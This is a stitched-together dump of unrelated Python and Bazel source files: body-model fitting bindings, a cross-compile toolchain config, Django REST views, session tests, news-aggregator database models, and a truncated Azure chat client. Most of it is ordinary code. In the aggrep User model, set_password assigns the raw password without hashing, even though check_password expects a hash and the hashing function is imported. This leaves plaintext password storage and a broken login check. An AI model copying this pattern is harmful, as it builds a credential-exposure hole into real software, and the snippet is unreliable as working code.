self.lib.fit_h36m_groundtruth.restype = None self.lib.adam_refit.argtypes = [ctypes.POINTER(ctypes.c_double)] * 5 + [ctypes.c_uint] self.lib.adam_refit.restype = None self.lib.adam_sequence_init.argtypes = [ctypes.POINTER(ctypes.c_double)] * 5 + [ctypes.c_uint] self.lib.adam_sequence_init.restype = None self.lib.adam_hsiu_fit_dome.argtypes = [ctypes.POINTER(ctypes.c_double)] * 5 + [ctypes.c_bool] self.lib.adam_hsiu_fit_dome.restype = None def reset_value(self): self.ctrans[:] = [0.0, 0.0, 500.0] self.ccoeff[:] = [0.0] * 30 self.cpose[:] = [0.0] * (62 * 3) self.cface_coeff[:] = [0.0] * 200 def load_totalmodel(self): self.lib.load_totalmodel(self.obj_file, self.model_file, self.pca_file, self.correspondence_file, self.cocoplus_regressor_file) def fit_total3d(self, joint3d): assert joint3d.shape[1] == 3, joint3d.shape self.ctarget_array[:joint3d.size] = joint3d.reshape(-1).tolist() self.lib.fit_total3d(self.ctarget_array, self.cpose, self.ccoeff, self.ctrans, self.cface_coeff) def total_visualize(self, cameraMode=0, target=True, first_render=False, position=0, meshSolid=True, scale=1.0, vis_type=1, show_joint=True): if cameraMode == 0: read_buffer = self.cret_bytes read_size = (600, 600) elif cameraMode == 1: read_buffer = self.cfull_bytes read_size = (1920, 1080) else: assert cameraMode == 2 read_buffer = self.cortho_bytes read_size = (1920, 1080) if first_render: self.lib.Total_visualize(read_buffer, self.ctarget_array if target else None, ctypes.c_uint(cameraMode), ctypes.c_uint(position), ctypes.c_bool(meshSolid), ctypes.c_float(scale), ctypes.c_int(vis_type), ctypes.c_bool(show_joint)) read_buffer[:] = [0] * len(read_buffer[:]) self.lib.Total_visualize(read_buffer, self.ctarget_array if target else None, ctypes.c_uint(cameraMode), ctypes.c_uint(position), ctypes.c_bool(meshSolid), ctypes.c_float(scale), ctypes.c_int(vis_type), ctypes.c_bool(show_joint)) img = bytes(read_buffer[:read_size[0] * read_size[1] * 4]) img = Image.frombytes("RGBA", read_size, img) img = ImageOps.flip(img) return img def fit_total2d(self, joint2d, K): assert joint2d.shape[1] == 2, joint2d.shape assert K.shape == (3, 3), K self.calibK[:] = K.reshape(-1).tolist() self.ctarget_array_2d[:] = joint2d.reshape(-1).tolist() self.lib.fit_total2d(self.ctarget_array_2d, self.calibK, self.cpose, self.ccoeff, self.ctrans, self.cface_coeff) def fit_total3d2d(self, joint3d, joint2d, K): assert joint3d.shape[1] == 3, joint3d.shape assert joint2d.shape[1] == 2, joint2d.shape assert K.shape == (3, 3), K self.ctarget_array[:joint3d.size] = joint3d.reshape(-1).tolist() self.ctarget_array_2d[:] = joint2d.reshape(-1).tolist() self.calibK[:] = K.reshape(-1).tolist() self.lib.fit_total3d2d(self.ctarget_array, self.ctarget_array_2d, self.calibK, self.cpose, self.ccoeff, self.ctrans, self.cface_coeff) def visualize_skeleton(self, joint3d, cameraMode=0, first_render=False, position=0, scale=1.0): if cameraMode == 0: read_buffer = self.cret_bytes read_size = (600, 600) elif cameraMode == 1: read_buffer = self.cfull_bytes read_size = (1920, 1080) else: assert cameraMode == 2 read_buffer = self.cortho_bytes read_size = (1920, 1080) read_buffer[:] = [0] * len(read_buffer[:]) assert joint3d.shape[1] == 3, joint3d.shape self.ctarget_array[:joint3d.size] = joint3d.reshape(-1).tolist() if first_render: self.lib.VisualizeSkeleton(read_buffer, self.ctarget_array, ctypes.c_uint(cameraMode), ctypes.c_uint(position), ctypes.c_float(scale)) self.lib.VisualizeSkeleton(read_buffer, self.ctarget_array, ctypes.c_uint(cameraMode), ctypes.c_uint(position), ctypes.c_float(scale)) img = bytes(read_buffer[:read_size[0] * read_size[1] * 4]) img = Image.frombytes("RGBA", read_size, img) img = ImageOps.flip(img) return img def fit_PAF_vec(self, joint2d, PAF_vec, K, joint3d=None, regressor_type=0, quan=False, fitPAFfirst=False, fit_face_exp=False): assert joint2d.shape == (139, 2), joint2d.shape assert K.shape == (3, 3), K assert PAF_vec.shape[1] == 3, PAF_vec.shape assert PAF_vec.shape[0] == 63, PAF_vec.shape if joint3d is not None: assert joint3d.shape[1] == 3, joint3d.shape self.ctarget_array[:] = joint3d.reshape(-1).tolist() self.calibK[:] = K.reshape(-1).tolist() self.ctarget_array_2d[:] = [0.0] * len(self.ctarget_array_2d[:]) self.ctarget_array_2d[:joint2d.shape[0] * 2] = joint2d.reshape(-1).tolist() self.PAF_array[:PAF_vec.size] = PAF_vec.reshape(-1).tolist() self.lib.fit_PAF_vec(self.ctarget_array_2d, self.PAF_array, self.calibK, self.cpose, self.ccoeff, self.ctrans, self.cface_coeff, None if joint3d is None else self.ctarget_array, ctypes.c_uint(regressor_type), ctypes.c_bool(quan), ctypes.c_bool(fitPAFfirst), ctypes.c_bool(fit_face_exp)) def adam_refit(self, joint3d, regressor_type): assert joint3d.shape[1] == 3, joint3d.shape self.ctarget_array[:] = joint3d.reshape(-1).tolist() self.lib.adam_refit(self.cpose, self.ccoeff, self.ctrans, self.cface_coeff, self.ctarget_array, regressor_type) def adam_sequence_init(self, joint3d, regressor_type): assert joint3d.shape[1] == 3, joint3d.shape self.ctarget_array[:] = joint3d.reshape(-1).tolist() self.lib.adam_sequence_init(self.cpose, self.ccoeff, self.ctrans, self.cface_coeff, self.ctarget_array, regressor_type) def adam_hsiu_fit_dome(self, target_joint, freeze_shape=False): assert target_joint.shape == (20, 3) self.ctarget_array[:60] = target_joint.reshape(-1).tolist() self.lib.adam_hsiu_fit_dome(self.cpose, self.ccoeff, self.ctrans, self.cface_coeff, self.ctarget_array, freeze_shape) def refit_eval_h36m(self, regressor_type, prior_weight=1.0): # refit Adam using skeleton reconstructed from current params, update params with pose prior && AngleAxis self.lib.refit_eval_h36m(self.cpose, self.ccoeff, self.ctrans, ctypes.c_uint(regressor_type), ctypes.c_double(prior_weight)) def fitSingleStage(self, joint2d, PAF_vec, K, regressor_type=0, fit_face_exp=False): assert joint2d.shape == (139, 2), joint2d.shape assert K.shape == (3, 3), K assert PAF_vec.shape[1] == 3, PAF_vec.shape assert PAF_vec.shape[0] == 63, PAF_vec.shape self.calibK[:] = K.reshape(-1).tolist() self.ctarget_array_2d[:] = [0.0] * len(self.ctarget_array_2d[:]) self.ctarget_array_2d[:joint2d.shape[0] * 2] = joint2d.reshape(-1).tolist() self.PAF_array[:PAF_vec.size] = PAF_vec.reshape(-1).tolist() self.lib.fitSingleStage(self.ctarget_array_2d, self.PAF_array, self.calibK, self.cpose, self.ccoeff, self.ctrans, self.cface_coeff, ctypes.c_uint(regressor_type), ctypes.c_bool(fit_face_exp)) 1000+ load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES") load( "@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl", "feature", "flag_group", "flag_set", "tool_path", ) all_link_actions = [ ACTION_NAMES.cpp_link_executable, ACTION_NAMES.cpp_link_dynamic_library, ACTION_NAMES.cpp_link_nodeps_dynamic_library, ] all_compile_actions = [ ACTION_NAMES.assemble, ACTION_NAMES.c_compile, ACTION_NAMES.clif_match, ACTION_NAMES.cpp_compile, ACTION_NAMES.cpp_header_parsing, ACTION_NAMES.cpp_module_codegen, ACTION_NAMES.cpp_module_compile, ACTION_NAMES.linkstamp_compile, ACTION_NAMES.lto_backend, ACTION_NAMES.preprocess_assemble, ] def _impl(ctx): tool_paths = [ tool_path( name = "ar", path = "wrappers/aarch64-none-linux-gnu-ar", ), tool_path( name = "cpp", path = "wrappers/aarch64-none-linux-gnu-cpp", ), tool_path( name = "gcc", path = "wrappers/aarch64-none-linux-gnu-gcc", ), tool_path( name = "gcov", path = "wrappers/aarch64-none-linux-gnu-gcov", ), tool_path( name = "ld", path = "wrappers/aarch64-none-linux-gnu-ld", ), tool_path( name = "nm", path = "wrappers/aarch64-none-linux-gnu-nm", ), tool_path( name = "objdump", path = "wrappers/aarch64-none-linux-gnu-objdump", ), tool_path( name = "strip", path = "wrappers/aarch64-none-linux-gnu-strip", ), ] default_compiler_flags = feature( name = "default_compiler_flags", enabled = True, flag_sets = [ flag_set( actions = all_compile_actions, flag_groups = [ flag_group( flags = [ "-no-canonical-prefixes", "-fno-canonical-system-headers", "-Wno-builtin-macro-redefined", "-D__DATE__=\"redacted\"", "-D__TIMESTAMP__=\"redacted\"", "-D__TIME__=\"redacted\"", ], ), ], ), ], ) default_linker_flags = feature( name = "default_linker_flags", enabled = True, flag_sets = [ flag_set( actions = all_link_actions, flag_groups = ([ flag_group( flags = [ "-lstdc++", ], ), ]), ), ], ) features = [ default_compiler_flags, default_linker_flags, ] return cc_common.create_cc_toolchain_config_info( ctx = ctx, cxx_builtin_include_directories = [ "/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/include/c++/10.2.1/", "/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/libc/usr/include/", "/proc/self/cwd/external/aarch64-none-linux-gnu/lib/gcc/aarch64-none-linux-gnu/10.2.1/include/", "/proc/self/cwd/external/aarch64-none-linux-gnu/aarch64-none-linux-gnu/libc/lib/", ], features = features, toolchain_identifier = "aarch64-toolchain", host_system_name = "local", target_system_name = "unknown", target_cpu = "unknown", target_libc = "unknown", compiler = "unknown", abi_version = "unknown", abi_libc_version = "unknown", tool_paths = tool_paths, ) cc_toolchain_config = rule( implementation = _impl, attrs = {}, provides = [CcToolchainConfigInfo], ) # -*- coding:utf-8 -*- from django.contrib.auth.models import User, Group from rest_framework import viewsets, status, mixins, generics, permissions, reverse from rest_framework.decorators import api_view from rest_framework.response import Response # 导入Response from rest_framework.status import HTTP_404_NOT_FOUND from rest_framework.views import APIView from quickstart.models import Snippet from quickstart.permissions import IsOwnerOrReadOnly from .serializers import UserSerializer, GroupSerializer, SnippetSerializer class UserViewSet(viewsets.ReadOnlyModelViewSet): """ 允许用户查看或编辑的API路径。 """ queryset = User.objects.all().order_by('-date_joined') serializer_class = UserSerializer # def get_object(self): # return self.request.user class GroupViewSet(viewsets.ModelViewSet): """ 允许组查看或编辑的API路径。 """ queryset = Group.objects.all() serializer_class = GroupSerializer # class SnippetList(mixins.ListModelMixin, # mixins.CreateModelMixin, # generics.GenericAPIView): class SnippetList(generics.ListCreateAPIView): """ 列出所有的snippets或者创建一个新的snippet。 """ queryset = Snippet.objects.all() serializer_class = SnippetSerializer permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly,) # def get(self, request, format=None): # snippets = Snippet.objects.all() # serializer = SnippetSerializer(snippets, many=True) # return Response(serializer.data) # def post(self, request, format=None): # serializer = SnippetSerializer(data=request.data) # if serializer.is_valid(): # serializer.save() # return Response(serializer.data, status=status.HTTP_201_CREATED) # return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) # def get(self, request, *args, **kwargs): # return self.list(request, *args, **kwargs) # # def post(self, request, *args, **kwargs): # return self.create(request, *args, **kwargs) class SnippetDetail(mixins.RetrieveModelMixin, mixins.UpdateModelMixin, mixins.DestroyModelMixin, generics.GenericAPIView): """ 检索,更新或删除一个snippet示例。 """ queryset = Snippet.objects.all() serializer_class = SnippetSerializer def get(self, request, *args, **kwargs): return self.retrieve(request, *args, **kwargs) def put(self, request, *args, **kwargs): return self.update(request, *args, **kwargs) def delete(self, request, *args, **kwargs): return self.destroy(request, *args, **kwargs) # def get_object(self, pk): # try: # return Snippet.objects.get(pk=pk) # except Snippet.DoesNotExist: # raise HTTP_404_NOT_FOUND # # def get(self, request, pk, format=None): # snippet = self.get_object(pk) # serializer = SnippetSerializer(snippet) # return Response(serializer.data) # # def put(self, request, pk, format=None): # snippet = self.get_object(pk) # serializer = SnippetSerializer(snippet, data=request.data) # if serializer.is_valid(): # serializer.save() # return Response(serializer.data) # return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) # # def delete(self, request, pk, format=None): # snippet = self.get_object(pk) # snippet.delete() # return Response(status=status.HTTP_204_NO_CONTENT) from django.contrib.auth.models import User class UserList(generics.ListAPIView): queryset = User.objects.all() serializer_class = UserSerializer class UserDetail(generics.RetrieveAPIView): queryset = User.objects.all() serializer_class = UserSerializer class UserRetiveViewset(mixins.RetrieveModelMixin, viewsets.GenericViewSet): queryset = User.objects.all() serializer_class = UserSerializer # @api_view(['GET']) # def api_root(request, format=None): # return Response({ # 'users': reverse('sa', request=request, format=format), # 'snippets': reverse('sad', request=request, format=format) # }) team23/django_t10e import inspect from django.db.models.manager import Manager as _Manager from django.utils import six class Manager(_Manager): # Ported from Django 1.8 @classmethod def _get_queryset_methods(cls, queryset_class): def create_method(name, method): def manager_method(self, *args, **kwargs): return getattr(self.get_queryset(), name)(*args, **kwargs) manager_method.__name__ = method.__name__ manager_method.__doc__ = method.__doc__ return manager_method new_methods = {} # Refs http://bugs.python.org/issue1785. predicate = inspect.isfunction if six.PY3 else inspect.ismethod for name, method in inspect.getmembers(queryset_class, predicate=predicate): # Only copy missing methods. if hasattr(cls, name): continue # Only copy public methods or methods with the attribute `queryset_only=False`. queryset_only = getattr(method, 'queryset_only', None) if queryset_only or (queryset_only is None and name.startswith('_')): continue # Copy the method onto the manager. new_methods[name] = create_method(name, method) return new_methods @classmethod def from_queryset(cls, queryset_class, class_name=None): if class_name is None: class_name = '%sFrom%s' % (cls.__name__, queryset_class.__name__) class_dict = { '_queryset_class': queryset_class, } class_dict.update(cls._get_queryset_methods(queryset_class)) return type(class_name, (cls,), class_dict) #!/usr/bin/env python3 def createPlanet(pname,name=''): from isceobj.Planet.Planet import Planet return Planet(name=name,pname=pname) 1-10 import os from datetime import datetime from jinja2 import Environment, FileSystemLoader from mrgenerator import utils, infos def write_readme(name=None, path=None): path = utils.get_path_directory() if path is None else path name = "README.md" if name is None else name env = Environment(loader=FileSystemLoader(utils.get_templates_dir())) template = env.get_template('default.pmd') filename = os.path.join(path, name) with open(filename, 'w', encoding='utf-8') as fh: fh.write(template.render( data=infos.get_info_readme(), datetime=datetime )) # # tests/middleware/test_session.py # import uuid import pytest import growler from unittest import mock from growler.middleware import session @pytest.fixture def mock_backend(): try: from unittest.mock import AsyncMock except ImportError: AsyncMock = None if not AsyncMock: mock = pytest.importorskip('mock') AsyncMock = mock.AsyncMock return AsyncMock() @pytest.fixture def sess(mock_backend): return session.Session(mock_backend) def test_sess_fixture(sess): assert isinstance(sess, session.Session) def test_getters_and_setters(sess): data = 'foo' sess['data'] = data assert sess['data'] is data assert sess.get('data') is data assert sess.get('notFound') is None assert len(sess) == 1 for i in sess: assert i == 'data' del sess['data'] assert 'data' not in sess assert len(sess) == 0 @pytest.mark.asyncio async def test_session_save(sess, mock_backend): await sess.save() mock_backend.save.assert_called_with(sess) @pytest.fixture def storage(): return session.DefaultSessionStorage() def test_storage_fixture(storage): assert isinstance(storage, session.DefaultSessionStorage) def test_defaultstorage_call_nocookie(storage): name = 'Fooo' storage.session_id_name = name req, res = mock.MagicMock(), mock.MagicMock() req.cookies = {} storage(req, res) assert isinstance(req.session, session.Session) assert isinstance(req.cookies[name], uuid.UUID) def test_defaultstorage_call(storage): req, res = mock.MagicMock(), mock.MagicMock() storage(req, res) assert isinstance(req.session, session.Session) def test_defaultstorage_save(storage): m = mock.MagicMock() storage.save(m) assert storage._sessions[m.id] is m._data """Database models.""" import short_url from flask import current_app, url_for from flask_sqlalchemy import BaseQuery from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy_searchable import SearchQueryMixin, make_searchable from sqlalchemy_utils.types import TSVectorType from werkzeug.security import check_password_hash, generate_password_hash from aggrep import db from aggrep.utils import decode_token, encode_token, now make_searchable(db.metadata) class PKMixin: """Mixin that adds a primary key to each model.""" __table_args__ = {"extend_existing": True} id = db.Column(db.Integer, primary_key=True) class CRUDMixin: """Mixin that adds convenience methods for CRUD (create, read, update, delete) operations.""" @classmethod def create(cls, **kwargs): """Create a new record and save it the database.""" instance = cls(**kwargs) return instance.save() def update(self, **kwargs): """Update specific fields of a record.""" for attr, value in kwargs.items(): setattr(self, attr, value) return self.save() def save(self): """Save the record.""" db.session.add(self) db.session.commit() return self def delete(self): """Remove the record from the database.""" db.session.delete(self) return db.session.commit() class BaseModel(PKMixin, CRUDMixin, db.Model): """Base model class that includes CRUD convenience methods.""" __abstract__ = True class PaginatedAPIMixin: """Pagination mixin.""" @staticmethod def to_collection_dict(query, page, per_page): """Paginate a collection.""" resources = query.paginate(page, per_page, False) data = { "items": [item.to_dict() for item in resources.items], "page": page, "per_page": per_page, "total_pages": resources.pages, "total_items": resources.total, } return data class Category(BaseModel): """Category model.""" __tablename__ = "categories" slug = db.Column(db.String(32), unique=True, nullable=False) title = db.Column(db.String(140), unique=True, nullable=False) def to_dict(self): """Return as a dict.""" return dict(id=self.id, slug=self.slug, title=self.title) def __repr__(self): """String representation.""" return self.title class Source(BaseModel): """Source model.""" __tablename__ = "sources" slug = db.Column(db.String(32), unique=True, nullable=False) title = db.Column(db.String(140), nullable=False) def to_dict(self): """Return as a dict.""" return dict(id=self.id, slug=self.slug, title=self.title) def __repr__(self): """String representation.""" return self.title class Status(BaseModel): """Feed status model.""" __tablename__ = "feed_statuses" feed_id = db.Column(db.Integer, db.ForeignKey("feeds.id"), unique=True) update_datetime = db.Column(db.DateTime, nullable=False, default=now) update_frequency = db.Column(db.Integer, default=0) active = db.Column(db.Boolean(), default=True) class Feed(BaseModel): """Feed model.""" __tablename__ = "feeds" source_id = db.Column(db.Integer, db.ForeignKey("sources.id")) category_id = db.Column(db.Integer, db.ForeignKey("categories.id")) url = db.Column(db.String(255), nullable=False) # ORM Relationship source = db.relationship("Source", uselist=False, backref="feeds") category = db.relationship("Category", uselist=False, backref="feeds") status = db.relationship("Status", uselist=False, backref="feed") def to_dict(self): """Return as a dict.""" return dict( source=self.source.to_dict(), category=self.category.to_dict(), url=self.url ) class PostQuery(BaseQuery, SearchQueryMixin): """Searchable Post query class.""" pass class Post(BaseModel, PaginatedAPIMixin): """Post model.""" __tablename__ = "posts" query_class = PostQuery feed_id = db.Column(db.Integer, db.ForeignKey("feeds.id")) title = db.Column(db.Unicode(255), nullable=False) desc = db.Column(db.UnicodeText) link = db.Column(db.String(255), nullable=False) published_datetime = db.Column(db.DateTime, nullable=False, default=now, index=True) ingested_datetime = db.Column(db.DateTime, nullable=False, default=now) actions = db.relationship("PostAction", uselist=False, backref="posts") search_vector = db.Column(TSVectorType("title", "desc")) feed = db.relationship("Feed", uselist=False, backref="posts") entities = db.relationship("Entity", backref="post") @property def uid(self): """Generate a deterministic UID from post ID.""" return short_url.encode_url(self.id, min_length=6) @staticmethod def from_uid(uid): """Given a deterministic UID, get the associated post.""" return Post.query.get(short_url.decode_url(uid)) @hybrid_property def ctr(self): """Post click through rate (object level).""" return float(self.actions.ctr) @ctr.expression def ctr(self): """Post click through rate (class level).""" return db.select([PostAction.ctr]).where(PostAction.post_id == self.id) def to_dict(self): """Return as a dict.""" payload = dict( id=self.id, uid=self.uid, title=self.title, link=url_for("app.follow_redirect", uid=self.uid, _external=True), post_url=self.link, feed=self.feed.to_dict(), published_datetime=self.published_datetime, ) return payload def __repr__(self): """String representation.""" return "{}: {}".format(self.id, self.title) class PostAction(BaseModel): """PostAction model.""" __tablename__ = "post_actions" post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), index=True ) clicks = db.Column(db.Integer, default=0) impressions = db.Column(db.Integer, default=0) ctr = db.Column(db.Numeric(4, 3), default=0) post = db.relationship("Post", uselist=False, backref="post_actions") class EntityProcessQueue(BaseModel): """Entity queue model.""" __tablename__ = "entity_queue" post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), unique=True ) post = db.relationship("Post") class Entity(BaseModel): """Entity model.""" __tablename__ = "entities" entity = db.Column(db.String(40), nullable=False) post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), index=True ) class SimilarityProcessQueue(BaseModel): """Similarity queue model.""" __tablename__ = "similarity_queue" post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), unique=True ) post = db.relationship("Post") class Similarity(BaseModel): """Similarity model.""" __tablename__ = "similarities" source_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), index=True ) related_id = db.Column(db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE")) class JobType(BaseModel): """JobType model.""" __tablename__ = "job_types" job = db.Column(db.String(40), nullable=False) def __repr__(self): """String representation.""" return "Job Type: {}".format(self.job) class JobLock(BaseModel): """Job lock model.""" __tablename__ = "joblock" job_type = db.Column( db.Integer, db.ForeignKey("job_types.id", ondelete="CASCADE"), unique=True ) lock_datetime = db.Column(db.DateTime, nullable=False, default=now) job = db.relationship("JobType", uselist=False, backref="joblock") def __repr__(self): """String representation.""" return "Job Lock: {} at {}".format(self.job.job, self.lock_datetime) class Bookmark(BaseModel): """Bookmark model.""" __tablename__ = "bookmarks" user_id = db.Column(db.Integer, db.ForeignKey("user.id"), index=True) post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), index=True ) action_datetime = db.Column(db.DateTime, nullable=False, default=now) post = db.relationship("Post", uselist=False, backref="bookmarks") db.Index("ix_user_bookmark", Bookmark.user_id, Bookmark.post_id) class PostView(BaseModel): """Post view model.""" __tablename__ = "post_views" user_id = db.Column(db.Integer, db.ForeignKey("user.id"), index=True) post_id = db.Column( db.Integer, db.ForeignKey("posts.id", ondelete="CASCADE"), index=True ) action_datetime = db.Column(db.DateTime, nullable=False, default=now) post = db.relationship("Post", uselist=False, backref="post_views") user_excluded_sources = db.Table( "user_excluded_sources", db.Column("user_id", db.Integer(), db.ForeignKey("user.id")), db.Column("source_id", db.Integer(), db.ForeignKey("sources.id")), ) user_excluded_categories = db.Table( "user_excluded_categories", db.Column("user_id", db.Integer(), db.ForeignKey("user.id")), db.Column("category_id", db.Integer(), db.ForeignKey("categories.id")), ) class User(BaseModel): """User model.""" email = db.Column(db.String(255), unique=True, index=True) password = db.Column(db.String(255), nullable=True) active = db.Column(db.Boolean(), default=True) confirmed = db.Column(db.Boolean(), default=False) last_seen = db.Column(db.DateTime) # ORM relationships excluded_sources = db.relationship( "Source", secondary=user_excluded_sources, lazy="subquery", backref=db.backref("user_excluded_sources", lazy=True), ) excluded_categories = db.relationship( "Category", secondary=user_excluded_categories, lazy="subquery", backref=db.backref("user_excluded_categories", lazy=True), ) bookmarks = db.relationship( "Post", secondary="bookmarks", order_by="desc(Bookmark.action_datetime)", lazy="dynamic", ) post_views = db.relationship( "Post", secondary="post_views", order_by="desc(PostView.action_datetime)", lazy="dynamic", ) def set_password(self, password): """Set a user's password.""" self.password = (password) self.save() def check_password(self, password): """Check a user's password.""" return check_password_hash(self.password, password) @staticmethod def get_user_from_identity(identity): """Get a user from a JWT.""" return User.query.filter_by(email=identity).first() def get_reset_password_token(self): """Get a password reset token.""" expires_in = 60 * 15 # 15 minutes secret = current_app.config["SECRET_KEY"] return encode_token("reset_password", self.id, secret, expires_in=expires_in) @staticmethod def verify_reset_password_token(token): """Verify a password reset token.""" secret = current_app.config["SECRET_KEY"] id = decode_token("reset_password", secret, token) if id is None: return None return User.query.get(id) def get_email_confirm_token(self): """Get an email confirmation token.""" expires_in = 60 * 60 * 24 # 24 hours secret = current_app.config["SECRET_KEY"] return encode_token("email_confirm", self.id, secret, expires_in=expires_in) @staticmethod def verify_email_confirm_token(token): """Verify an email confirmation token.""" secret = current_app.config["SECRET_KEY"] id = decode_token("email_confirm", secret, token) if id is None: return None return User.query.get(id) def to_dict(self): """Return as a dict.""" return dict(email=self.email, confirmed=self.confirmed) def __repr__(self): """String representation.""" return self.email from dagster.cli.load_handle import _cli_load_invariant, handle_for_pipeline_cli_args from dagster.core.definitions.container import get_active_repository_data_from_image from dagster.core.snap import PipelineSnapshot from dagster.seven import is_module_available def get_pipeline_snapshot_from_cli_args(cli_args): _cli_load_invariant(cli_args.get('pipeline_name') is not None) if cli_args.get('image'): _cli_load_invariant( is_module_available('docker'), msg='--image is not supported without dagster[docker] or the Python package docker installed.', ) active_repo_data = get_active_repository_data_from_image(cli_args.get('image')) return active_repo_data.get_pipeline_snapshot(cli_args.get('pipeline_name')[0]) else: pipeline_definition = handle_for_pipeline_cli_args(cli_args).build_pipeline_definition() return PipelineSnapshot.from_pipeline_def(pipeline_definition) sabjoslo/talking-politics from pyspan.json_to_txt import re_sent_end, get_sentences def test_get_sentences(): sentence1 = "This is a test sentence." assert get_sentences(sentence1, mode = "speech") == [sentence1] assert get_sentences(sentence1, mode = "sentences") == [sentence1] sentence2 = "This is a test sentence. So is this." assert get_sentences(sentence2, mode = "speech") == [sentence2] assert get_sentences(sentence2, mode = "sentences") == \ ["This is a test sentence.", "So is this."] sentence3 = "Is this a test sentence? I guess so." assert get_sentences(sentence3, mode = "speech") == [sentence3] assert get_sentences(sentence3, mode = "sentences") == \ ["Is this a test sentence?", "I guess so."] sentence4 = "This might be a test sentence...what do you think?" assert get_sentences(sentence4, mode = "speech") == [sentence4] assert get_sentences(sentence4, mode = "sentences") == [sentence4] ## I don't see a way around "edge cases" like these. #sentence5 = "Mr. Jones lives on 5th Ave. Mrs. Smith visited Dr. Doe, who works on 4th St., next to the grocery store." #assert get_sentences(sentence5, mode = "speech") == [sentence5] #assert get_sentences(sentence5, mode = "sentences") == \ # ["Mr. Jones lives on 5th Ave.", # "Mrs. Smith visited Dr. Doe, who works on 4th St., next to the grocery store."] sentence6 = "The House votes on H. Res. 1 today. I ask unanimous consent..." assert get_sentences(sentence6, mode = "speech") == [sentence6] assert get_sentences(sentence6, mode = "sentences") == \ ["The House votes on H. Res. 1 today.", "I ask unanimous consent..."] sentence7 = "This is 1.2 test sentences." assert get_sentences(sentence7, mode = "speech") == [sentence7] assert get_sentences(sentence7, mode = "sentences") == [sentence7] sentence8 = "LT. Bob won an award! Now I'll say a new sentence." assert get_sentences(sentence8, mode = "speech") == [sentence8] assert get_sentences(sentence8, mode = "sentences") == \ ["LT. Bob won an award!", "Now I'll say a new sentence."] sentence9 = "This is a sentence about salt. This is a sentence about pepper." assert get_sentences(sentence9, mode = "speech") == [sentence9] assert get_sentences(sentence9, mode = "sentences") == \ ["This is a sentence about salt.", "This is a sentence about pepper."] sentence10 = "This is a sentence about SALT. This is a sentence about PEPPER." assert get_sentences(sentence10, mode = "speech") == [sentence10] assert get_sentences(sentence10, mode = "sentences") == \ ["This is a sentence about SALT.", "This is a sentence about PEPPER."] sentence11 = "Can you believe this is a sentence?! What a world..." assert get_sentences(sentence11, mode = "speech") == [sentence11] assert get_sentences(sentence11, mode = "sentences") == \ ["Can you believe this is a sentence?!", "What a world..."] sentence12 = "Mr. Jones lives on 5th Ave., next to the pharmacy. Mrs. Smith visited Dr. Doe, who works on 4th St., next to the grocery store." assert get_sentences(sentence12, mode = "speech") == [sentence12] assert get_sentences(sentence12, mode = "sentences") == \ ["Mr. Jones lives on 5th Ave., next to the pharmacy.", "Mrs. Smith visited Dr. Doe, who works on 4th St., next to the grocery store."] sdk/communication/azure-communication-chat/azure/communication/chat/_generated/aio/operations/_chat_thread_operations.py # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- import datetime from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar import warnings from azure.core.async_paging import AsyncItemPaged, AsyncList from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error from azure.core.pipeline import PipelineResponse from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest from ... import models as _models T = TypeVar('T') ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] class ChatThreadOperations: """ChatThreadOperations async operations. You should not instantiate this class directly. Instead, you should create a Client instance that instantiates it for you and attaches it as an attribute. :ivar models: Alias to model classes used in this operation group. :type models: ~azure.communication.chat.models :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. """ models = _models def __init__(self, client, config, serializer, deserializer) -> None: self._client = client self._serialize = serializer self._deserialize = deserializer self._config = config def list_chat_read_receipts( self, chat_thread_id: str, max_page_size: Optional[int] = None, skip: Optional[int] = None, **kwargs: Any ) -> AsyncIterable["_models.ChatMessageReadReceiptsCollection"]: """Gets chat message read receipts for a thread. Gets chat message read receipts for a thread. :param chat_thread_id: Thread id to get the chat message read receipts for. :type chat_thread_id: str :param max_page_size: The maximum number of chat message read receipts to be returned per page. :type max_page_size: int :param skip: Skips chat message read receipts up to a specified position in response. :type skip: int :keyword callable cls: A custom type or function that will be passed the direct response :return: An iterator like instance of either ChatMessageReadReceiptsCollection or the result of cls(response) :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.communication.chat.models.ChatMessageReadReceiptsCollection] :raises: ~azure.core.exceptions.HttpResponseError """ cls = kwargs.pop('cls', None) # type: ClsType["_models.ChatMessageReadReceiptsCollection"] error_map = { 404: ResourceNotFoundError, 409: ResourceExistsError, 401: lambda response: ClientAuthenticationError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 403: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 429: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), 503: lambda response: HttpResponseError(response=response, model=self._deserialize(_models.CommunicationErrorResponse, response)), } error_map.update(kwargs.pop('error_map', {})) api_version = "2021-04-05-preview6" accept = "application/json" def prepare_request(next_link=None): # Construct headers header_parameters = {} # type: Dict[str, Any] header_parameters['Accept'] = self._serialize.header("accept", 